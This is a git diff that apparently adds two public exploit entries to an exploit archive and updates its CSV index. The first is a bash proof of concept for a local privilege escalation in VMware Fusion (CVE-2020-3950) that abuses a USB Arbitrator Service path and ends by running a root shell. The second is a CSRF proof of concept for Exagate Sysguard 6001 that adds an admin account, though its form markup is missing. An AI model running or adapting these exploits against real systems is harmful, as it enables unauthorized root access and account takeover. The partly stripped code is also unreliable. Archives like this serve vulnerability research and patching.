diff --git a/exploits/macos/local/48235.sh b/exploits/macos/local/48235.sh new file mode 100755 index 000000000..c6a0f7f73 --- /dev/null +++ b/exploits/macos/local/48235.sh @@ -0,0 +1,43 @@ +# Exploit Title: VMware Fusion 11.5.2 - Privilege Escalation +# Date: 2020-03-17 +# Exploit Author: Rich Mirch +# Vendor Homepage: https://www.vmware.com/products/fusion.html +# Vendor Advisory: https://www.vmware.com/security/advisories/VMSA-2020-0005.html +# Software Link: https://download3.vmware.com/software/fusion/file/VMware-Fusion-11.5.1-15018442.dmg +# Versions: +# VMware Fusion Professional 11.5.1 (15018442) +# VMware Fusion Professional 11.5.2 (15794494) +# +# Tested on: macOS 10.14.6 +# CVE : CVE-2020-3950 +# Source PoC: https://raw.githubusercontent.com/mirchr/security-research/master/vulnerabilities/CVE-2020-3950.sh +# +# +#!/bin/bash +echo "CVE-2020-3950 VMware Fusion EoP PoC by @0xm1rch" + +mkdir -p ~/a/b/c +mkdir -p ~/Contents/Library/services + +cat > ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service </dev/null +"${PWD}/Open VMware USB Arbitrator Service" >/dev/null 2>/dev/null & +p=$! +echo "Sleeping for 5 seconds" +sleep 5 +kill ${p?} +wait + +echo "Sleeping for 7 seconds" +sleep 7 + +$HOME/.woot -p \ No newline at end of file diff --git a/exploits/php/webapps/48234.txt b/exploits/php/webapps/48234.txt new file mode 100644 index 000000000..8c9a73dce --- /dev/null +++ b/exploits/php/webapps/48234.txt @@ -0,0 +1,19 @@ +# Exploit Title: Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin) +# Exploit Author: Metin Yunus Kandemir +# Vendor Homepage: https://www.exagate.com/ +# Software Link: https://www.exagate.com/sysguard-6001 +# Version: SYSGuard 6001 + +HTML CSRF PoC : + + + +
+ + + + + +
+ + \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 816dfdb88..19b8c416e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10994,6 +10994,7 @@ id,file,description,date,author,type,platform,port 48227,exploits/windows/local/48227.txt,"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path",2020-03-18,"El Masas",local,windows, 48231,exploits/multiple/local/48231.md,"Microsoft VSCode Python Extension - Code Execution",2020-03-17,Doyensec,local,multiple, 48232,exploits/macos/local/48232.md,"VMWare Fusion - Local Privilege Escalation",2020-03-17,Grimm,local,macos, +48235,exploits/macos/local/48235.sh,"VMware Fusion 11.5.2 - Privilege Escalation",2020-03-20,"Rich Mirch",local,macos, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42484,3 +42485,4 @@ id,file,description,date,author,type,platform,port 48220,exploits/php/webapps/48220.py,"PHPKB Multi-Language 9 - Authenticated Directory Traversal",2020-03-16,"Antonio Cannito",webapps,php, 48221,exploits/php/webapps/48221.py,"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php, 48225,exploits/hardware/webapps/48225.txt,"Netlink GPON Router 1.0.11 - Remote Code Execution",2020-03-18,shellord,webapps,hardware, +48234,exploits/php/webapps/48234.txt,"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)",2020-03-20,"Metin Yunus Kandemir",webapps,php,